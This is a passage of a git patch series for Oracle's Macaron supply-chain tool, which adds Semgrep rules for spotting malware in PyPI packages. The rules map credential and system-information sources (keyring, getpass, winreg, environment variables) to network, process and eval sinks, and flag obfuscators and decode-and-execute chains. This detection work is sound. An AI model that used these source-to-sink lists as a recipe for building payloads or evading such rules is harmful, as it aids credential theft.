code has not been downloaded, or there is an error accessing the file. + """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + if not os.path.isabs(path): + path = os.path.join(self.package_sourcecode_path, path) + + if not os.path.exists(path): + error_msg = f"Unable to locate file {path}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + try: + with open(path, "rb") as file: + return file.read() + except OSError as read_error: + error_msg = f"Unable to read file {path}: {read_error}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) from read_error + + def iter_sourcecode(self) -> Iterator[tuple[str, bytes]]: + """ + Iterate through all source code files. + + Returns + ------- + tuple[str, bytes] + The source code file path, and the the raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded. + """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + for root, _directories, files in os.walk(self.package_sourcecode_path): + for file in files: + if root == ".": + root_path = os.getcwd() + os.linesep + else: + root_path = root + filepath = os.path.join(root_path, file) + + with open(filepath, "rb") as handle: + contents = handle.read() + + yield filepath, contents From beda14d26ffe852d1a929e7cf0492ae2f68f62bc Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 30 Jan 2025 15:09:39 +1000 Subject: [PATCH 05/37] feat: support for semgrep rules, currently two implemented, with custom options --- src/macaron/config/defaults.ini | 6 +- .../sourcecode/pypi_sourcecode_analyzer.py | 130 +++------ .../pypi_malware_rules/exfiltration.yaml | 146 ++++++++++ .../pypi_malware_rules/obfuscation.yaml | 256 ++++++++++++++++++ .../package_registry/pypi_registry.py | 2 +- 5 files changed, 441 insertions(+), 99 deletions(-) create mode 100644 src/macaron/resources/pypi_malware_rules/exfiltration.yaml create mode 100644 src/macaron/resources/pypi_malware_rules/obfuscation.yaml diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index acae98d55..41df6ca92 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -601,6 +601,6 @@ epoch_threshold = 3 # The number of days +/- the day of publish the calendar versioning day may be. day_publish_error = 4 -# yaml configuration file containing suspicious patterns. Can be full path or relative to -# folder where macaron is installed. This will be normalised to the OS path type. -suspicious_patterns_file = src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml +# absolute path to where a custom set of semgrep rules for source code analysis are stored. These will be included +# with Macaron's default rules. The path will be normalised to the OS path type. +custom_semgrep_rules = diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index d372c4fd3..beb5e553b 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -18,11 +18,9 @@ import subprocess # nosec import tempfile from collections import defaultdict -from typing import Any - -import yaml from macaron.config.defaults import defaults +from macaron.config.global_config import global_config from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult @@ -58,79 +56,61 @@ class PyPISourcecodeAnalyzer: def __init__(self) -> None: """Collect required data for analysing the source code.""" - self.suspicious_patterns = self._load_defaults() - self.rule_files: list = [] + self.default_rule_path, self.custom_rule_path = self._load_defaults() + + def _load_defaults(self) -> tuple[str, str | None]: + """ + Load the default semgrep rules and, if present, the custom semgrep rules provided by the user. - def _load_defaults(self) -> dict[str, dict[str, list]]: - """Load the suspicious pattern from suspicious_pattern.yaml. + Semgrep validation is run on the custom rules provided by the user. Returns ------- - dict[str: dict[str, list]] - The suspicious pattern. + tuple[str, str | None] + The default rule path and the custom rule path or None if one was not provided Raises ------ ConfigurationError - if the suspicious pattern file is not in the expected format or cannot be accessed. + If the heuristic.pypi entry is not present, or if the semgrep validation of the custom rule path failed. """ - suspicious_patterns: dict[str, dict[str, list]] = {} + default_rule_path = os.path.join(global_config.resources_path, "pypi_malware_rules") section_name = "heuristic.pypi" if defaults.has_section(section_name): section = defaults[section_name] else: - error_msg = f"Unable to find section {section_name}, which is required to load suspicious patterns." + error_msg = f"Unable to find section {section_name}, which must be present." logger.debug(error_msg) raise ConfigurationError(error_msg) - configuration_name = "suspicious_patterns_file" - filename = section.get(configuration_name) - if filename is None: - error_msg = f"Unable to find {configuration_name} in configuration file." + configuration_name = "custom_semgrep_rules" + custom_rule_path = section.get(configuration_name) + if not custom_rule_path: # i.e. None or empty string + logger.debug("No custom path listed under %s, using default rules only.", configuration_name) + return default_rule_path, None + + custom_rule_path = os.path.normpath(custom_rule_path) + if not os.path.exists(custom_rule_path): + error_msg = f"Unable to locate path {custom_rule_path}" logger.debug(error_msg) raise ConfigurationError(error_msg) - filename = os.path.normpath(filename) + semgrep_commands: list[str] = ["semgrep", "scan", "--validate", "--config", custom_rule_path] try: - with open(filename, encoding="utf-8") as file: - configured_patterns: dict[str, JsonType] = yaml.safe_load(file) - except FileNotFoundError as file_error: - error_msg = f"Unable to locate {filename}" - logger.debug(error_msg) - raise ConfigurationError(error_msg) from file_error - except yaml.YAMLError as yaml_error: - error_msg = f"Unable to parse {filename} as a yaml file." + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = f"Unable to run semgrep validation on {custom_rule_path} with arguments {semgrep_commands}: {semgrep_error}" logger.debug(error_msg) - raise ConfigurationError(error_msg) from yaml_error + raise ConfigurationError(error_msg) from semgrep_error - for expected_category in self.EXPECTED_PATTERN_CATEGORIES: - if expected_category not in configured_patterns: - error_msg = ( - f"Expected suspicious pattern category {expected_category} present in" - + f" {filename}: must have categories {self.EXPECTED_PATTERN_CATEGORIES}" - ) - logger.debug(error_msg) - raise ConfigurationError(error_msg) - - for category, patterns in configured_patterns.items(): - suspicious_patterns[category] = {} - if isinstance(patterns, list): - suspicious_patterns[category][category] = patterns - elif isinstance(patterns, dict): - for subcategory, subpatterns in patterns.items(): - if not isinstance(subpatterns, list): - error_msg = f"Expected subcategory {subcategory} items to be" + f" a list in {filename}" - logger.debug(error_msg) - raise ConfigurationError(error_msg) - - suspicious_patterns[category][subcategory] = subpatterns - else: - error_msg = f"Expected category {category} to be either a list" + f" or dictionary in {filename}" - logger.debug(error_msg) - raise ConfigurationError(error_msg) + if process.returncode != 0: + error_msg = f"Error running semgrep validation on {custom_rule_path} with arguments" f" {process.args}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) - return suspicious_patterns + logger.debug("Including custom ruleset from %s.", custom_rule_path) + return default_rule_path, custom_rule_path def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the source code of the package for malicious patterns. @@ -162,9 +142,9 @@ def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu logger.debug(error_msg) raise HeuristicAnalyzerValueError(error_msg) - self._create_rules() - for rule_file in self.rule_files: - semgrep_commands.extend(["--config", rule_file.name]) + semgrep_commands.extend(["--config", self.default_rule_path]) + if self.custom_rule_path: + semgrep_commands.extend(["--config", self.custom_rule_path]) semgrep_commands.append(source_code_path) with tempfile.NamedTemporaryFile(mode="w+", delete=True) as output_json_file: @@ -203,8 +183,6 @@ def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu end = json_extract(finding, ["end", "line"], int) analysis_result[category].append({"file": file, "start": start, "end": end}) - self._clear_rules() - return result, dict(analysis_result) def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: @@ -258,44 +236,6 @@ def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu return result, analysis_result - def _create_rules(self) -> None: - rule_list: list[dict[str, Any]] = [] - contents: dict = {} - - if self.rule_files: - self._clear_rules() - - # import rules - for category, patterns in self.suspicious_patterns[IMPORTS].items(): - rule: dict[str, Any] = {} - pattern_list: list = [] - - rule["id"] = category - rule["severity"] = "ERROR" - rule["languages"] = ["python"] - rule["message"] = f"Detected suspicious imports from the '{category}' category" - - for pattern in patterns: - pattern_list.append({"pattern": f"import {pattern}"}) - pattern_list.append({"pattern": f"from {pattern} import $X"}) - pattern_list.append({"pattern": f'__import__("{pattern}")'}) - - rule["pattern-either"] = pattern_list - rule_list.append(rule) - - contents = {"rules": rule_list} - - with tempfile.NamedTemporaryFile( - "w", prefix=f"{IMPORTS}_", suffix=".yaml", delete=False - ) as import_patterns_file: - yaml.dump(contents, import_patterns_file) - self.rule_files.append(import_patterns_file) - - def _clear_rules(self) -> None: - for file in self.rule_files: - file.close() - self.rule_files.clear() - class DataFlowTracer(ast.NodeVisitor): """The class is used to create the symbol table and analyze the dataflow.""" diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml new file mode 100644 index 000000000..b0c8b078a --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -0,0 +1,146 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +rules: +- id: remote-exfiltration + metadata: + description: Detected the exfiltration of data to a remote endpoint + message: Detected exfiltration of sensitive data to a remote endpoint. + languages: + - python + severity: ERROR + mode: taint + options: + symbolic_propagation: true + pattern-sources: + - pattern-either: + # result of code/command evaluation + - pattern: exec(...) + - pattern: eval(...) + - pattern: ast.literal_eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # environment variables + - pattern: os.environ + - pattern: os.environ[...] + - pattern: os.environ.get(...) + - pattern: os.environb + - pattern: os.environb[...] + - pattern: os.environb.get(...) + - pattern: os.getenv(...) + - pattern: os.getenvb(...) + + # system information + - pattern: os.uname(...) + - pattern: os.confstr(...) + - pattern: os.confstr_names + - pattern: os.sysconf(...) + - pattern: os.sysconf_names + - pattern: platform.release(...) + - pattern: platform.version(...) + - pattern: platform.uname(...) + - pattern: platform.win32_ver(...) + - pattern: platform.win32_edition(...) + - pattern: platform.win32_is_iot(...) + - pattern: platform.mac_ver(...) + - pattern: platform.ios_ver(...) + - pattern: platform.libc_ver(...) + - pattern: platform.freedesktop_os_release(...) + - pattern: platform.android_ver(...) + + # network information + - pattern: psutil.net_connections(...) + - pattern: psutil.net_if_addrs(...) + - pattern: psutil.net_if_stats(...) + - pattern: platform.node(...) + - pattern: platform.platform(...) + - pattern: socket.gethostname(...) + - pattern: socket.gethostbyname(...) + - pattern: socket.gethostbyname_ex(...) + - pattern: socket.getfqdn(...) + - pattern: socket.if_nameindex(...) + + # user information + - pattern: psutil.users(...) + + # sensitive information + - pattern: getpass.getpass(...) + - pattern: getpass.unix_getpass(...) + - pattern: getpass.win_getpass(...) + - pattern: getpass.getuser(...) + - pattern: pwd.getpwuid(...) + - pattern: pwd.getpwnam(...) + - pattern: pwd.getpwall(...) + - pattern: keyring.get_keyring(...) + - pattern: keyring.get_password(...) + - pattern: keyring.get_credential(...) + - pattern: winreg.ConnectRegistry(...) + - pattern: winreg.LoadKey(...) + - pattern: winreg.OpenKey(...) + - pattern: winreg.OpenKeyEx(...) + - pattern: winreg.QueryInfoKey(...) + - pattern: winreg.QueryValue(...) + - pattern: winreg.QueryValueEx(...) + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - pattern: socket.socket(...) + - pattern: $SOC.accept(...) + - pattern: $SOC.bind(...) + - pattern: $SOC.connect(...) + - pattern: $SOC.connect_ex(...) + - pattern: $SOC.listen(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.send(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.Session(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.PoolManager(...) + - pattern: urllib3.request(...) + - pattern: urllib3.HTTPConnectionPool(...) + - pattern: urllib3.HTTPSConnectionPool(...) + - pattern: urllib3.ConnectionPool(...) + - pattern: urllib3.ProxyManager(...) + - pattern: urllib3.contrib.socks.SOCKSProxyManager(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using urlrequest module + - pattern: UrlRequest(...) + - pattern: UrlRequestRequests(...) + - pattern: UrlRequestUrllib(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.AsyncClient(...) + - pattern: httpx.AsyncHTTPTransport(...) + - pattern: httpx.Client(...) + - pattern: httpx.Request(...) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml new file mode 100644 index 000000000..5f3bf329c --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -0,0 +1,256 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +rules: +- id: default-assigning + metadata: + description: Identifies when a default python function is assigned to another variable + message: Found an instance of assigning a builtin python function to a variable + languages: + - python + severity: ERROR + pattern-either: + # assigning, many obfuscation tools listed below do this + - pattern: $VAR = __import__ + - pattern: $VAR = getattr + - pattern: $VAR = bytes + - pattern: $VAR = bytearray + - pattern: $VAR = exec + - pattern: $VAR = eval + - pattern: $VAR = setattr + - pattern: $VAR = compile + - pattern: $VAR = map + - pattern: $VAR = open + - pattern: $VAR = zip + - pattern: $VAR = vars + - pattern: $VAR = dir + # doing the same using the builtins module + - pattern: $VAR = builtins.__import__ + - pattern: $VAR = builtins.getattr + - pattern: $VAR = builtins.bytes + - pattern: $VAR = builtins.bytearray + - pattern: $VAR = builtins.exec + - pattern: $VAR = builtins.eval + - pattern: $VAR = builtins.setattr + - pattern: $VAR = builtins.compile + - pattern: $VAR = builtins.map + - pattern: $VAR = builtins.open + - pattern: $VAR = builtins.zip + - pattern: $VAR = builtins.vars + - pattern: $VAR = builtins.dir + - pattern: $VAR = __import__('builtins').__import__ + - pattern: $VAR = __import__('builtins').getattr + - pattern: $VAR = __import__('builtins').bytes + - pattern: $VAR = __import__('builtins').bytearray + - pattern: $VAR = __import__('builtins').exec + - pattern: $VAR = __import__('builtins').eval + - pattern: $VAR = __import__('builtins').setattr + - pattern: $VAR = __import__('builtins').compile + - pattern: $VAR = __import__('builtins').builtins.map + - pattern: $VAR = __import__('builtins').open + - pattern: $VAR = __import__('builtins').zip + - pattern: $VAR = __import__('builtins').vars + - pattern: $VAR = __import__('builtins').dir + +- id: obfuscation-tools + metadata: + description: detects the use of python obfuscation packages on the source code + message: Found an instance of import and/or using python obfuscation tools + languages: + - python + severity: ERROR + pattern-either: + # pyarmor: pyarmor.readthedocs.io/en/latest/index.html + - pattern: import __pyarmor__ + - pattern: from $MODULE import __pyarmor__ + - pattern: from $MODULE import pyarmor_runtime + - pattern: __import__('__pyarmor__') + # pyarmor RTF mode: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern: __assert_armored__($PAYLOAD) + - patterns: + - pattern: | + def $FUNC_NAME(...): + ... + - metavariable-regex: + metavariable: $FUNC_NAME + regex: ^pyarmor__\d+$ + # inline pyarmor marker: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern-regex: ^# pyarmor:.? + # obfuscated names using pyob.oxyry.com with O, o, 0 or github.com/QQuick/Opy and pyobfuscate using l, I, 1 + - patterns: + - pattern: | + def $OBF(...): + ... + - pattern: | + class $OBF(...): + ... + - pattern: $OBF = ... + - metavariable-regex: + metavariable: $OBF + regex: (^_?[Oo0]|[1Il]+$) + # obfuscated using pyobfuscate.com + - pattern: pyobfuscate=... + # obfuscated using liftoff.github.io/pyminifier + - pattern: import mystificate + +- id: inline-imports + metadata: + description: detects the use of the private inline import __import__(...) + message: detected use of inline imports + languages: + - python + severity: ERROR + pattern: __import__($MODULE) + +- id: decode-and-execute + metadata: + description: detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes + message: detected the flow of a decoded string value to a remote endpoint, process, code evaluation, or file write + languages: + - python + severity: ERROR + mode: taint + options: + symbolic_propagation: true + pattern-sources: + - pattern-either: + # marshal encryption + - pattern: marshal.loads(...) + - pattern: __import__('marshal').loads(...) + # bytes decoding + - pattern: | + "...".decode(...) + - pattern: $BYTES.decode(...) + - pattern: bytes.decode(...) + - pattern: $BYTES.join(...).decode() + # decompression + - pattern: zlib.decompress(...) + - pattern: __import__('zlib').decompress(...) + # base64 decoded string values + - pattern: base64.b64decode(...) + - pattern: __import__('base64').decode(...) + - pattern: b64decode(...) + # hex encoded values + - pattern: bytes.fromhex(...) + # unicode construction + - patterns: + - pattern: $STRING.join(map($FOO, [...])) + - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) + - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) + - metavariable-regex: + metavariable: $FOO + regex: unicode|unichr|chr|ord + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - pattern: socket.socket(...) + - pattern: $SOC.accept(...) + - pattern: $SOC.bind(...) + - pattern: $SOC.connect(...) + - pattern: $SOC.connect_ex(...) + - pattern: $SOC.listen(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.send(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.Session(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.PoolManager(...) + - pattern: urllib3.request(...) + - pattern: urllib3.HTTPConnectionPool(...) + - pattern: urllib3.HTTPSConnectionPool(...) + - pattern: urllib3.ConnectionPool(...) + - pattern: urllib3.ProxyManager(...) + - pattern: urllib3.contrib.socks.SOCKSProxyManager(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using urlrequest module + - pattern: UrlRequest(...) + - pattern: UrlRequestRequests(...) + - pattern: UrlRequestUrllib(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.AsyncClient(...) + - pattern: httpx.AsyncHTTPTransport(...) + - pattern: httpx.Client(...) + - pattern: httpx.Request(...) + + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) + - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + + # code evaluation/execution + - pattern: exec(...) + - pattern: eval(...) + - pattern: ast.literal_eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # file write + - pattern: $FILE.write(...) + - pattern: $MODULE.dumps(...) + - pattern: os.write(...) + - pattern: os.writev(...) + - pattern: os.pwrite(...) + - pattern: os.pwritev(...) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 4fa5d1855..f3d349d8f 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -246,7 +246,7 @@ def download_package_sourcecode(self, url: str) -> str: raise InvalidHTTPResponseError(error_msg) from read_error extracted_dir = os.listdir(temp_dir) - if len(extracted_dir) == 1 and re.sub(".tar.gz$", "", file_name) == extracted_dir[0]: + if len(extracted_dir) == 1 and package_name == extracted_dir[0]: # structure used package name and version as top-level directory temp_dir = os.path.join(temp_dir, extracted_dir[0]) From ea5a5f74dfd6194d29e466068890b08c7a362f77 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 3 Feb 2025 11:05:56 +1000 Subject: [PATCH 06/37] test: setup test environment for source code analyzer --- .pre-commit-config.yaml | 2 + .semgrepignore | 1 + pyproject.toml | 11 +- .../sourcecode/pypi_sourcecode_analyzer.py | 18 +- .../pypi_malware_rules/exfiltration.yaml | 52 ++- .../pypi_malware_rules/obfuscation.yaml | 34 +- .../checks/detect_malicious_metadata_check.py | 2 +- .../obfuscation/decode_and_execute.py | 26 ++ .../obfuscation/default_assigning.py | 61 +++ .../obfuscation/expected_results.json | 405 ++++++++++++++++++ .../sourcecode_samples/obfuscation/tools.py | 69 +++ .../pypi/test_pypi_sourcecode_analyzer.py | 54 +++ 12 files changed, 703 insertions(+), 32 deletions(-) create mode 100644 .semgrepignore create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py create mode 100644 tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index bc55cb969..94f2d2625 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -65,6 +65,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: [flake8-bugbear==22.10.27, flake8-builtins==2.0.1, flake8-comprehensions==3.10.1, flake8-docstrings==1.6.0, flake8-mutable==1.2.0, flake8-noqa==1.4.0, flake8-pytest-style==1.6.0, flake8-rst-docstrings==0.3.0, pep8-naming==0.13.2] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--config, .flake8] # Check GitHub Actions workflow files. @@ -94,6 +95,7 @@ repos: language: python files: ^src/macaron/|^tests/ types: [text, python] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--show-traceback, --config-file, pyproject.toml] # Check for potential security issues. diff --git a/.semgrepignore b/.semgrepignore new file mode 100644 index 000000000..3d53fd964 --- /dev/null +++ b/.semgrepignore @@ -0,0 +1 @@ +# Items added to this file will be ignored by Semgrep. diff --git a/pyproject.toml b/pyproject.toml index fa86bf95e..86f57c285 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -123,12 +123,14 @@ Issues = "https://github.com/oracle/macaron/issues" [tool.bandit] tests = [] skips = ["B101"] - +exclude_dirs = ['tests/malware_analyzer/pypi/resources/sourcecode_samples'] # https://github.com/psf/black#configuration [tool.black] line-length = 120 - +force-exclude = ''' +tests/malware_analyzer/pypi/resources/sourcecode_samples/ +''' # https://github.com/commitizen-tools/commitizen # https://commitizen-tools.github.io/commitizen/bump/ @@ -174,7 +176,6 @@ exclude = [ "SECURITY.md", ] - # https://pycqa.github.io/isort/ [tool.isort] profile = "black" @@ -185,7 +186,6 @@ skip_gitignore = true # https://mypy.readthedocs.io/en/stable/config_file.html#using-a-pyproject-toml [tool.mypy] -# exclude= show_error_codes = true show_column_numbers = true check_untyped_defs = true @@ -213,7 +213,6 @@ module = [ ] ignore_missing_imports = true - # https://pylint.pycqa.org/en/latest/user_guide/configuration/index.html [tool.pylint.MASTER] fail-under = 10.0 @@ -244,6 +243,7 @@ disable = [ "too-many-statements", "duplicate-code", ] +ignore-paths = "tests/malware_analyzer/pypi/resources/sourcecode_samples" [tool.pylint.MISCELLANEOUS] notes = [ @@ -265,6 +265,7 @@ addopts = """-vv -ra --tb native \ --doctest-modules --doctest-continue-on-failure --doctest-glob '*.rst' \ --cov macaron \ --ignore tests/integration \ + --ignore tests/malware_analyzer/pypi/resources/sourcecode_samples \ """ # Consider adding --pdb # https://docs.python.org/3/library/doctest.html#option-flags doctest_optionflags = "IGNORE_EXCEPTION_DETAIL" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index beb5e553b..e3c325690 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -54,11 +54,11 @@ class PyPISourcecodeAnalyzer: EXPECTED_PATTERN_CATEGORIES = [IMPORTS, CONSTANTS, CALLS] - def __init__(self) -> None: + def __init__(self, resources_path: str = global_config.resources_path) -> None: """Collect required data for analysing the source code.""" - self.default_rule_path, self.custom_rule_path = self._load_defaults() + self.default_rule_path, self.custom_rule_path = self._load_defaults(resources_path) - def _load_defaults(self) -> tuple[str, str | None]: + def _load_defaults(self, resources_path: str) -> tuple[str, str | None]: """ Load the default semgrep rules and, if present, the custom semgrep rules provided by the user. @@ -72,9 +72,15 @@ def _load_defaults(self) -> tuple[str, str | None]: Raises ------ ConfigurationError - If the heuristic.pypi entry is not present, or if the semgrep validation of the custom rule path failed. + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. """ - default_rule_path = os.path.join(global_config.resources_path, "pypi_malware_rules") + default_rule_path = os.path.join(resources_path, "pypi_malware_rules") + if not os.path.exists(default_rule_path): + error_msg = f"Error with locating default rule path {default_rule_path}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + section_name = "heuristic.pypi" if defaults.has_section(section_name): @@ -112,7 +118,7 @@ def _load_defaults(self) -> tuple[str, str | None]: logger.debug("Including custom ruleset from %s.", custom_rule_path) return default_rule_path, custom_rule_path - def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the source code of the package for malicious patterns. This is the first phase of the source code analyzer. diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml index b0c8b078a..fa96f43d3 100644 --- a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -4,7 +4,7 @@ rules: - id: remote-exfiltration metadata: - description: Detected the exfiltration of data to a remote endpoint + description: Identifies the flow of sensitive information to a remote endpoint. message: Detected exfiltration of sensitive data to a remote endpoint. languages: - python @@ -23,6 +23,43 @@ rules: - pattern: __import__('builtins').exec(...) - pattern: __import__('builtins').eval(...) + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) + - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + # environment variables - pattern: os.environ - pattern: os.environ[...] @@ -84,6 +121,19 @@ rules: - pattern: winreg.QueryInfoKey(...) - pattern: winreg.QueryValue(...) - pattern: winreg.QueryValueEx(...) + - pattern: sqlite3.connect(...) 